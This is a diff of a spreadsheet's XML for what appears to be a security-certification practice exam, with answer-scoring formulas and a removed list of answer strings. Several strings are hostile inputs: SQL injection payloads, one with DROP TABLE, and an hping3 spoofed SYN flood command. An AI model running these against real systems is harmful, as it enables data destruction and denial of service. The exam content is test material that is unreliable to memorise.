+        <v>0</v>
+      </c>
+    </row>
+    <row r="97" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A97" s="1">
+        <v>96</v>
+      </c>
+      <c r="B97" t="s">
+        <v>264</v>
+      </c>
+      <c r="D97" t="b">
+        <f t="shared" si="1"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="98" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A98" s="1">
+        <v>97</v>
+      </c>
+      <c r="B98" t="s">
+        <v>665</v>
+      </c>
+      <c r="D98" t="b">
+        <f t="shared" si="1"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="99" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A99" s="1">
+        <v>98</v>
+      </c>
+      <c r="B99" t="s">
+        <v>666</v>
+      </c>
+      <c r="D99" t="b">
+        <f t="shared" si="1"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="100" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A100" s="1">
+        <v>99</v>
+      </c>
+      <c r="B100" t="s">
+        <v>666</v>
+      </c>
+      <c r="D100" t="b">
+        <f t="shared" si="1"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="101" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A101" s="1">
+        <v>100</v>
+      </c>
+      <c r="B101" t="s">
+        <v>665</v>
+      </c>
+      <c r="D101" t="b">
+        <f t="shared" si="1"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="102" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A102" s="1">
+        <v>101</v>
+      </c>
+      <c r="B102" t="s">
+        <v>666</v>
+      </c>
+      <c r="D102" t="b">
+        <f>IF(B102=C102,TRUE,FALSE)</f>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="103" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A103" s="1">
+        <v>102</v>
+      </c>
+      <c r="B103" t="s">
+        <v>433</v>
+      </c>
+      <c r="D103" t="b">
+        <f t="shared" si="1"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="104" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A104" s="1">
+        <v>103</v>
+      </c>
+      <c r="B104" t="s">
+        <v>666</v>
+      </c>
+      <c r="D104" t="b">
+        <f t="shared" si="1"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="105" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A105" s="1">
+        <v>104</v>
+      </c>
+      <c r="B105" t="s">
+        <v>666</v>
+      </c>
+      <c r="D105" t="b">
+        <f t="shared" si="1"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="106" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A106" s="1">
+        <v>105</v>
+      </c>
+      <c r="B106" t="s">
+        <v>433</v>
+      </c>
+      <c r="D106" t="b">
+        <f t="shared" si="1"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="107" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A107" s="1">
+        <v>106</v>
+      </c>
+      <c r="B107" t="s">
+        <v>264</v>
+      </c>
+      <c r="D107" t="b">
+        <f t="shared" si="1"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="108" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A108" s="1">
+        <v>107</v>
+      </c>
+      <c r="B108" t="s">
+        <v>666</v>
+      </c>
+      <c r="D108" t="b">
+        <f t="shared" si="1"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="109" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A109" s="1">
+        <v>108</v>
+      </c>
+      <c r="B109" t="s">
+        <v>264</v>
+      </c>
+      <c r="D109" t="b">
+        <f t="shared" si="1"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="110" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A110" s="1">
+        <v>109</v>
+      </c>
+      <c r="B110" t="s">
+        <v>433</v>
+      </c>
+      <c r="D110" t="b">
+        <f t="shared" si="1"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="111" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A111" s="1">
+        <v>110</v>
+      </c>
+      <c r="B111" t="s">
+        <v>433</v>
+      </c>
+      <c r="D111" t="b">
+        <f t="shared" si="1"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="112" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A112" s="1">
+        <v>111</v>
+      </c>
+      <c r="B112" t="s">
+        <v>433</v>
+      </c>
+      <c r="D112" t="b">
+        <f t="shared" si="1"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="113" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A113" s="1">
+        <v>112</v>
+      </c>
+      <c r="B113" t="s">
+        <v>433</v>
+      </c>
+      <c r="D113" t="b">
+        <f t="shared" si="1"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="114" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A114" s="1">
+        <v>113</v>
+      </c>
+      <c r="B114" t="s">
+        <v>666</v>
+      </c>
+      <c r="D114" t="b">
+        <f t="shared" si="1"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="115" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A115" s="1">
+        <v>114</v>
+      </c>
+      <c r="B115" t="s">
+        <v>665</v>
+      </c>
+      <c r="D115" t="b">
+        <f t="shared" si="1"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="116" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A116" s="1">
+        <v>115</v>
+      </c>
+      <c r="B116" t="s">
+        <v>666</v>
+      </c>
+      <c r="D116" t="b">
+        <f t="shared" si="1"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="117" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A117" s="1">
+        <v>116</v>
+      </c>
+      <c r="B117" t="s">
+        <v>666</v>
+      </c>
+      <c r="D117" t="b">
+        <f t="shared" si="1"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="118" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A118" s="1">
+        <v>117</v>
+      </c>
+      <c r="B118" t="s">
+        <v>433</v>
+      </c>
+      <c r="D118" t="b">
+        <f t="shared" si="1"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="119" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A119" s="1">
+        <v>118</v>
+      </c>
+      <c r="B119" t="s">
+        <v>666</v>
+      </c>
+      <c r="D119" t="b">
+        <f t="shared" si="1"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="120" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A120" s="1">
+        <v>119</v>
+      </c>
+      <c r="B120" t="s">
+        <v>264</v>
+      </c>
+      <c r="D120" t="b">
+        <f t="shared" si="1"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="121" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A121" s="1">
+        <v>120</v>
+      </c>
+      <c r="B121" t="s">
+        <v>264</v>
+      </c>
+      <c r="D121" t="b">
+        <f t="shared" si="1"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="122" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A122" s="1">
+        <v>121</v>
+      </c>
+      <c r="B122" t="s">
+        <v>433</v>
+      </c>
+      <c r="D122" t="b">
+        <f t="shared" si="1"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="123" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A123" s="1">
+        <v>122</v>
+      </c>
+      <c r="B123" t="s">
+        <v>666</v>
+      </c>
+      <c r="D123" t="b">
+        <f t="shared" si="1"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="124" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A124" s="1">
+        <v>123</v>
+      </c>
+      <c r="B124" t="s">
+        <v>433</v>
+      </c>
+      <c r="D124" t="b">
+        <f t="shared" si="1"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="125" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A125" s="1">
+        <v>124</v>
+      </c>
+      <c r="B125" t="s">
+        <v>665</v>
+      </c>
+      <c r="D125" t="b">
+        <f t="shared" si="1"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="126" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A126" s="1">
+        <v>125</v>
+      </c>
+      <c r="B126" t="s">
+        <v>666</v>
+      </c>
+      <c r="D126" t="b">
+        <f t="shared" si="1"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="127" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A127" s="1">
+        <v>126</v>
+      </c>
+      <c r="B127" t="s">
+        <v>433</v>
+      </c>
+      <c r="D127" t="b">
+        <f t="shared" si="1"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="128" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A128" s="1">
+        <v>127</v>
+      </c>
+      <c r="B128" t="s">
+        <v>665</v>
+      </c>
+      <c r="D128" t="b">
+        <f t="shared" si="1"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="129" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A129" s="1">
+        <v>128</v>
+      </c>
+      <c r="B129" t="s">
+        <v>433</v>
+      </c>
+      <c r="D129" t="b">
+        <f t="shared" si="1"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="130" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A130" s="1">
+        <v>129</v>
+      </c>
+      <c r="B130" t="s">
+        <v>665</v>
+      </c>
+      <c r="D130" t="b">
+        <f t="shared" si="1"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="131" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A131" s="1">
+        <v>130</v>
+      </c>
+      <c r="B131" t="s">
+        <v>264</v>
+      </c>
+      <c r="D131" t="b">
+        <f t="shared" ref="D131:D144" si="2">IF(B131=C131,TRUE,FALSE)</f>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="132" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A132" s="1">
+        <v>131</v>
+      </c>
+      <c r="B132" t="s">
+        <v>433</v>
+      </c>
+      <c r="D132" t="b">
+        <f t="shared" si="2"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="133" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A133" s="1">
+        <v>132</v>
+      </c>
+      <c r="B133" t="s">
+        <v>433</v>
+      </c>
+      <c r="D133" t="b">
+        <f t="shared" si="2"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="134" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A134" s="1">
+        <v>133</v>
+      </c>
+      <c r="B134" t="s">
+        <v>433</v>
+      </c>
+      <c r="D134" t="b">
+        <f t="shared" si="2"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="135" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A135" s="1">
+        <v>134</v>
+      </c>
+      <c r="B135" t="s">
+        <v>264</v>
+      </c>
+      <c r="D135" t="b">
+        <f t="shared" si="2"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="136" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A136" s="1">
+        <v>135</v>
+      </c>
+      <c r="B136" t="s">
+        <v>665</v>
+      </c>
+      <c r="D136" t="b">
+        <f t="shared" si="2"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="137" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A137" s="1">
+        <v>136</v>
+      </c>
+      <c r="B137" t="s">
+        <v>264</v>
+      </c>
+      <c r="D137" t="b">
+        <f t="shared" si="2"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="138" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A138" s="1">
+        <v>137</v>
+      </c>
+      <c r="B138" t="s">
+        <v>264</v>
+      </c>
+      <c r="D138" t="b">
+        <f t="shared" si="2"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="139" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A139" s="1">
+        <v>138</v>
+      </c>
+      <c r="B139" t="s">
+        <v>666</v>
+      </c>
+      <c r="D139" t="b">
+        <f t="shared" si="2"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="140" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A140" s="1">
+        <v>139</v>
+      </c>
+      <c r="B140" t="s">
+        <v>665</v>
+      </c>
+      <c r="D140" t="b">
+        <f t="shared" si="2"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="141" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A141" s="1">
+        <v>140</v>
+      </c>
+      <c r="B141" t="s">
+        <v>433</v>
+      </c>
+      <c r="D141" t="b">
+        <f t="shared" si="2"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="142" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A142" s="1">
+        <v>141</v>
+      </c>
+      <c r="B142" t="s">
+        <v>665</v>
+      </c>
+      <c r="D142" t="b">
+        <f t="shared" si="2"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="143" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A143" s="1">
+        <v>142</v>
+      </c>
+      <c r="B143" t="s">
+        <v>264</v>
+      </c>
+      <c r="D143" t="b">
+        <f t="shared" si="2"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="144" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A144" s="1">
+        <v>143</v>
+      </c>
+      <c r="B144" t="s">
+        <v>666</v>
+      </c>
+      <c r="D144" t="b">
+        <f t="shared" si="2"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="146" spans="4:7" x14ac:dyDescent="0.25">
+      <c r="D146">
+        <f>COUNTIF(D94:D144,TRUE)</f>
+        <v>0</v>
+      </c>
+      <c r="F146" t="s">
+        <v>456</v>
+      </c>
+      <c r="G146">
+        <f>SUM(D146)</f>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="147" spans="4:7" x14ac:dyDescent="0.25">
+      <c r="F147" t="s">
+        <v>457</v>
+      </c>
+      <c r="G147">
+        <f>SUM(G146/143*100)</f>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="149" spans="4:7" x14ac:dyDescent="0.25">
+      <c r="F149" t="s">
+        <v>458</v>
+      </c>
+      <c r="G149" t="str">
+        <f>IF(G146&gt;=102,"PASS","FAIL")</f>
+        <v>FAIL</v>
+      </c>
+    </row>
+  </sheetData>
+  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
+</worksheet>
 </file>
--- a/Exam excel.xlsx
+++ b/Exam excel.xlsx
@@ -8,9 +8,9 @@
       <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="C:\Users\stratumhr\Downloads\"/>
     </mc:Choice>
   </mc:AlternateContent>
-  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{ACD6BC06-7966-486F-9109-59999988E2DD}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
+  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{6F82ACB0-1DC3-4DC3-BC04-9C6CD6089206}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
   <bookViews>
-    <workbookView xWindow="-120" yWindow="-120" windowWidth="20730" windowHeight="11160" activeTab="6" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/>
+    <workbookView xWindow="-120" yWindow="-120" windowWidth="20730" windowHeight="11160" activeTab="5" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/>
   </bookViews>
   <sheets>
     <sheet name="1" sheetId="1" r:id="rId1"/>
@@ -31,7 +31,7 @@
 </file>
 
 <file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
-<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1152" uniqueCount="667">
+<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1154" uniqueCount="506">
   <si>
     <t>Slno</t>
   </si>
@@ -1542,496 +1542,13 @@
     <t>Dark web footprinting</t>
   </si>
   <si>
-    <t>netcat</t>
-  </si>
-  <si>
-    <t xml:space="preserve"> [related:]</t>
-  </si>
-  <si>
-    <t>-sA</t>
-  </si>
-  <si>
-    <t>RIPE</t>
-  </si>
-  <si>
-    <t>Hit-list scanning technique.</t>
-  </si>
-  <si>
-    <t xml:space="preserve"> Evilginx</t>
-  </si>
-  <si>
-    <t>Watering hole attack</t>
-  </si>
-  <si>
-    <t>. Dorian is signing the message with his private key, and Poly will verify that the message came from Dorian by using Dorian’s public key.</t>
-  </si>
-  <si>
-    <t>select * from Users where UserName = ‘attack’ ’ or 1=1 -- and UserPassword = ‘123456’</t>
-  </si>
-  <si>
-    <t>Use Marie’s public key to encrypt the message.</t>
-  </si>
-  <si>
-    <t>SNMP and he should change it to SNMP V3.</t>
-  </si>
-  <si>
-    <t>-sV</t>
-  </si>
-  <si>
-    <t>Limit the administrator or root-level access to the minimum number of users.</t>
-  </si>
-  <si>
-    <t>The -D flag</t>
-  </si>
-  <si>
-    <t>Use of command-line interface</t>
-  </si>
-  <si>
-    <t>Man-in-the-cloud (MITC) attack</t>
-  </si>
-  <si>
-    <t>This php file silently executes the code and grabs the user’s session cookie and session ID.</t>
-  </si>
-  <si>
-    <t>ACK flag probe scan</t>
-  </si>
-  <si>
-    <t>The service is LDAP, and you must change it to 636, which is LDAPS.</t>
-  </si>
-  <si>
-    <t>Implement cognitive radios in the physical layer</t>
-  </si>
-  <si>
-    <t>You should check your ARP table and see if there is one IP address with two different MAC addresses.</t>
-  </si>
-  <si>
-    <t>Bryan’s public key; Alice’s public key</t>
-  </si>
-  <si>
-    <t>Pass the hash</t>
-  </si>
-  <si>
-    <t>Encrypt data client-side before uploading to the cloud and retain control of the encryption keys.</t>
-  </si>
-  <si>
-    <t>Initiating DNS tunneling to communicate with the command-and-control server.</t>
-  </si>
-  <si>
-    <t>Implementing a brute force attack to verify system vulnerability</t>
-  </si>
-  <si>
-    <t>Test 1: The test was conducted because SYN and ECN-Echo flags enabled to allow the hacker to probe the nature of the response and subsequently determine the OS fingerprint</t>
-  </si>
-  <si>
-    <t>z=400, u=4: The attacker constructs 4 SQL payloads, each focusing on tables with 400 records, influencing all columns of all tables.</t>
-  </si>
-  <si>
-    <t>Ping of Death attack</t>
-  </si>
-  <si>
-    <t>Writing YARA rules specifically to identify the goodware files triggering false positives</t>
-  </si>
-  <si>
-    <t>Man-in-the-middle Attack Using Forged ICMP and ARP Spoofing</t>
-  </si>
-  <si>
-    <t>Adopt a Continual/Adaptive Security Strategy involving ongoing prediction, prevention, detection, and response actions to ensure comprehensive computer network defense.</t>
-  </si>
-  <si>
-    <t>The hacker attempts to bypass the special character filter by encoding his malicious input, which could potentially enable him to successfully inject damaging SQL queries.</t>
-  </si>
-  <si>
-    <t>' OR 'a'='a; DROP TABLE members; --: This payload combines the manipulation of the WHERE clause with a destructive action, causing data loss</t>
-  </si>
-  <si>
-    <t>Invalidate the TGS the attacker acquired</t>
-  </si>
-  <si>
-    <t>Use network segmentation to isolate IoMT devices from the main network.</t>
-  </si>
-  <si>
-    <t>Implement a mobile device management solution that restricts the installation of non-approved applications.</t>
-  </si>
-  <si>
-    <t>Unauthorized users may perform privilege escalation using unnecessarily created accounts</t>
-  </si>
-  <si>
-    <t>Both the organization and John share responsibility because they did not adequately manage the vulnerabilities.</t>
-  </si>
-  <si>
-    <t>The secure LDAP connection was not properly initialized due to a lack of 'use_ssl = True' in the server object creation.</t>
-  </si>
-  <si>
-    <t>Display a captive portal page that warns users about the possibility of Evil Twin attacks</t>
-  </si>
-  <si>
-    <t>dnsrecon -r 162.241.216.0/24 -n nsl.example.com -t std</t>
-  </si>
-  <si>
-    <t>Switch to an enumeration tool that supports IPv6</t>
-  </si>
-  <si>
-    <t>Use the IDLE/IPID header scan technique with the command "-sI"</t>
-  </si>
-  <si>
-    <t>Organize regular employee awareness training regarding social engineering techniques and preventive measures</t>
-  </si>
-  <si>
-    <t>m=90, b=15: The server can manage 90 connections per second, but the attacker's 100 connections exceed this, and with each connection held up for 15 seconds, the attack duration could be significant.</t>
-  </si>
-  <si>
-    <t>The total number of high, medium, and low-risk vulnerabilities detected throughout the network.</t>
-  </si>
-  <si>
-    <t xml:space="preserve"> Applying the latest patches and updating software programs </t>
-  </si>
-  <si>
-    <t>Request a service ticket for the service principal name of the target service account</t>
-  </si>
-  <si>
-    <t>Conduct a vulnerability assessment specifically for the IoT devices.</t>
-  </si>
-  <si>
-    <t>Probe the IPC share by attempting to brute force admin credentials</t>
-  </si>
-  <si>
-    <t>Advise using a dedicated network for the smart home system, separate from the home's main Wi-Fi network.</t>
-  </si>
-  <si>
-    <t>Suppress detailed error messages, as they can expose sensitive information.</t>
-  </si>
-  <si>
-    <t xml:space="preserve">Implement the Diffie-Hellman protocol for secure key exchange. </t>
-  </si>
-  <si>
-    <t xml:space="preserve">Use client-side encryption and manage encryption keys independently of the CSP. </t>
-  </si>
-  <si>
-    <t>Thin Whois model with a malfunctioning server</t>
-  </si>
-  <si>
-    <t>Data encryption with AES-256: Provides high security with better performance than 3DES, but not as fast as other AES key sizes.</t>
-  </si>
-  <si>
-    <t>Deploy a Cloud Access Security Broker (CASB).</t>
-  </si>
-  <si>
-    <t>q=17, T=220: Even though the attacker increases 'q', the total delay ('q*d' = 221 seconds) just surpasses the threshold, possibly activating an alert.</t>
-  </si>
-  <si>
-    <t>WPA2-PSK with AES encryption</t>
-  </si>
-  <si>
-    <t>AES key size=192 bits: This configuration is a balance between options A and B, providing moderate security and performance.</t>
-  </si>
-  <si>
-    <t>Whaling and Targeted Attacks</t>
-  </si>
-  <si>
-    <t xml:space="preserve">Enforce a policy that only allows app installations from approved corporate app stores. </t>
-  </si>
-  <si>
-    <t>The time recipient spent reading the email</t>
-  </si>
-  <si>
-    <t>Enable encryption on the wireless network</t>
-  </si>
-  <si>
-    <t>The attacker should leverage a botnet to launch a Pulse Wave attack, sending high-volume traffic pulses at regular intervals</t>
-  </si>
-  <si>
-    <t xml:space="preserve">Synthetic Identity Theft </t>
-  </si>
-  <si>
-    <t>Conduct comprehensive training sessions for employees on various social engineering methodologies and the risks associated with revealing confidential data.</t>
-  </si>
-  <si>
-    <t>Checking for hardware and software misconfigurations to identify any possible loopholes</t>
-  </si>
-  <si>
-    <t>snmp-check (snmp_enum Module) to gather a wide array of information about the target</t>
-  </si>
-  <si>
-    <t>Base metric represents the inherent qualities of a vulnerability.</t>
-  </si>
-  <si>
-    <t>Implement network segmentation to separate IIoT devices from the rest of the network.</t>
-  </si>
-  <si>
-    <t>Side-Channel Attack</t>
-  </si>
-  <si>
-    <t>Vulnerability scanning software is not immune to software engineering flaws that might lead to serious vulnerabilities being missed</t>
-  </si>
-  <si>
-    <t>Default settings reveal server software type; change these settings</t>
-  </si>
-  <si>
-    <t>Enable WPA2 or WPA3 encryption on the wireless router</t>
-  </si>
-  <si>
-    <t>Dumpster diving in the target company's trash bins for valuable printouts</t>
-  </si>
-  <si>
-    <t>AutoYara - Because it automates the generation of YARA rules from a set of malicious and benign files</t>
-  </si>
-  <si>
-    <t>Utilize a blind injection technique that uses time delays or error signatures to extract information</t>
-  </si>
-  <si>
-    <t>Script Kiddies trying to compromise the system using pre-made scripts.</t>
-  </si>
-  <si>
-    <t>location: This operator finds information for a specific location</t>
-  </si>
-  <si>
-    <t>Analyzing the initial exploitation methods, the adversary used.</t>
-  </si>
-  <si>
-    <t>Jason should use passive reconnaissance techniques such as WHOIS lookups, NS lookups, and web research.</t>
-  </si>
-  <si>
-    <t xml:space="preserve">Implement WPA3 encryption for the store's Wi-Fi network </t>
-  </si>
-  <si>
-    <t>TCP SYN Ping Scan</t>
-  </si>
-  <si>
-    <t>Performing regular server configuration audits</t>
-  </si>
-  <si>
-    <t>Implement IPsec in addition to SSL/TLS.</t>
-  </si>
-  <si>
-    <t>Instant Messenger Applications; verifying the sender's identity before opening any files</t>
-  </si>
-  <si>
-    <t>Insider attacks and the organization should have implemented robust access control and monitoring.</t>
-  </si>
-  <si>
-    <t>Use a Cloud Access Security Broker (CASB).</t>
-  </si>
-  <si>
-    <t>Implement SSL/TLS encryption for data transmission between the IoT device and the mobile app.</t>
-  </si>
-  <si>
-    <t>The target network has a stateful firewall present</t>
-  </si>
-  <si>
-    <t>Unnecessary services could contain vulnerabilities; minimize the attack surface.</t>
-  </si>
-  <si>
-    <t>Utilizing the char encoding function to convert hexadecimal and decimal values into characters that pass-through SQL engine parsing</t>
-  </si>
-  <si>
-    <t xml:space="preserve">Implement 802.1X authentication </t>
-  </si>
-  <si>
-    <t>They are performing an SYN scan to stealthily identify open ports without fully establishing a connection.</t>
-  </si>
-  <si>
-    <t>Connecting the system to the production network during the malware analysis</t>
-  </si>
-  <si>
-    <t xml:space="preserve">Service-based solution offered by an auditing firm </t>
-  </si>
-  <si>
-    <t>Hping3 -S 192.168.1.1 -a 192.168.1.254 -p 22 --flood</t>
-  </si>
-  <si>
-    <t>Initiate with Nmap for a ping sweep, then use Metasploit to scan for open ports and services, and finally use Hping3 to perform remote OS fingerprinting.</t>
-  </si>
-  <si>
-    <t>Contact your Internet Service Provider (ISP) for assistance</t>
-  </si>
-  <si>
-    <t>Encrypt the data client-side before uploading to the SaaS environment and manage encryption keys independently.</t>
-  </si>
-  <si>
-    <t>Conduct a vulnerability scan on the open port to identify any potential weaknesses.</t>
-  </si>
-  <si>
-    <t>Metamorphic and Rootkit malware</t>
-  </si>
-  <si>
-    <t>Hybrid Attack</t>
-  </si>
-  <si>
-    <t>RST hijacking</t>
-  </si>
-  <si>
-    <t>bettercap</t>
-  </si>
-  <si>
-    <t>Exploit the NetBIOS Session Service on TCP port 139 to gain unauthorized access to the file system</t>
-  </si>
-  <si>
-    <t>Implement network scanning and monitoring tools</t>
-  </si>
-  <si>
-    <t>It should prevent the app from connecting to any unencrypted Wi-Fi networks.</t>
-  </si>
-  <si>
-    <t>The attacker will exploit the malicious payload delivered to the target organization and establish a foothold.</t>
-  </si>
-  <si>
-    <t>It operates on the principle of least privilege, verifying each request as if it is from an untrusted source, regardless of its location.</t>
-  </si>
-  <si>
-    <t>Apply a digital signature mechanism.</t>
-  </si>
-  <si>
-    <t>Develop a browser exploit to bypass the HTTPOnly restriction, then use a HTML-encoded XSS payload to retrieve the cookies.</t>
-  </si>
-  <si>
-    <t xml:space="preserve">Use Hex encoding to represent the SQL query string </t>
-  </si>
-  <si>
-    <t>Regularly updating and patching the server software</t>
-  </si>
-  <si>
-    <t>h=1987 (prime): The attacker's packet rate exceeds the server's capacity, causing potential unresponsiveness.</t>
-  </si>
-  <si>
-    <t>The program is a keylogger; the team should employ intrusion detection systems and regularly update the system software.</t>
-  </si>
-  <si>
-    <t xml:space="preserve">ntptrace 192.168.1.1 </t>
-  </si>
-  <si>
-    <t>Use UDP Traceroute in the Linux operating system by executing the 'traceroute' command with the destination IP or domain name.</t>
-  </si>
-  <si>
-    <t>ARP Ping Scan</t>
-  </si>
-  <si>
-    <t>Employing a tool like Sublist3r, which is designed to enumerate the subdomains of websites using OSINT</t>
-  </si>
-  <si>
-    <t xml:space="preserve"> f=490: The server can handle 490 SYN packets per second. With 's' exceeding 'f' by 10, the response time shoots up (2^10 = 1024 times the usual response time), indicating a system overload.</t>
-  </si>
-  <si>
-    <t>The tester could execute a Brute Force attack, leveraging the lack of account lockout policy and the verbose error messages to guess the correct credentials.</t>
-  </si>
-  <si>
-    <t>The attacker might be implementing MAC flooding to overwhelm the switch's memory.</t>
-  </si>
-  <si>
-    <t>Deploy network intrusion detection systems (IDS) across the IoT network.</t>
-  </si>
-  <si>
-    <t>Xmas Scan, because it can pass through filters undetected, depending on the security mechanisms installed</t>
-  </si>
-  <si>
-    <t>Error-based SQL Injection</t>
-  </si>
-  <si>
-    <t>Qualys Vulnerability Management</t>
-  </si>
-  <si>
-    <t>Raw Sniffing</t>
-  </si>
-  <si>
-    <t>Apply asymmetric encryption with RSA and use the private key for signing.</t>
-  </si>
-  <si>
-    <t>Ensuring atomicity of operations between checking and using data resources</t>
-  </si>
-  <si>
-    <t>Encrypt all sensitive data stored on the device.</t>
-  </si>
-  <si>
-    <t>Store the potentially malicious program on an external medium, such as a CD-ROM.</t>
-  </si>
-  <si>
-    <t>The hacker might employ a 'blind' SQL Injection attack, taking advantage of the application's true or false responses to extract data bit by bit</t>
-  </si>
-  <si>
-    <t>Applying the Diffie-Hellman protocol to exchange the symmetric key.</t>
-  </si>
-  <si>
-    <t>Implement WPA2 or WPA3 encryption</t>
-  </si>
-  <si>
-    <t xml:space="preserve">Launch a Cross-Site Scripting (XSS) attack, aiming to bypass the client-side sanitization and exploit the exposure of session cookies. </t>
-  </si>
-  <si>
-    <t>User-directed spidering with tools like Burp Suite and WebScarab</t>
-  </si>
-  <si>
-    <t>Investigate for anomalies in file movements or unauthorized data access attempts within your database system</t>
-  </si>
-  <si>
-    <t>The Wi-Fi password is too complex and long.</t>
-  </si>
-  <si>
-    <t>Inject a benign script inline to the form to see if it executes</t>
-  </si>
-  <si>
-    <t>DLL Hijacking</t>
-  </si>
-  <si>
-    <t>Determine the impact of enabling the audit feature.</t>
-  </si>
-  <si>
-    <t>WPA3</t>
-  </si>
-  <si>
-    <t>-PP</t>
-  </si>
-  <si>
-    <t>Side-channel attack</t>
-  </si>
-  <si>
-    <t>2 → 5 → 6 → 1 → 3 → 4</t>
-  </si>
-  <si>
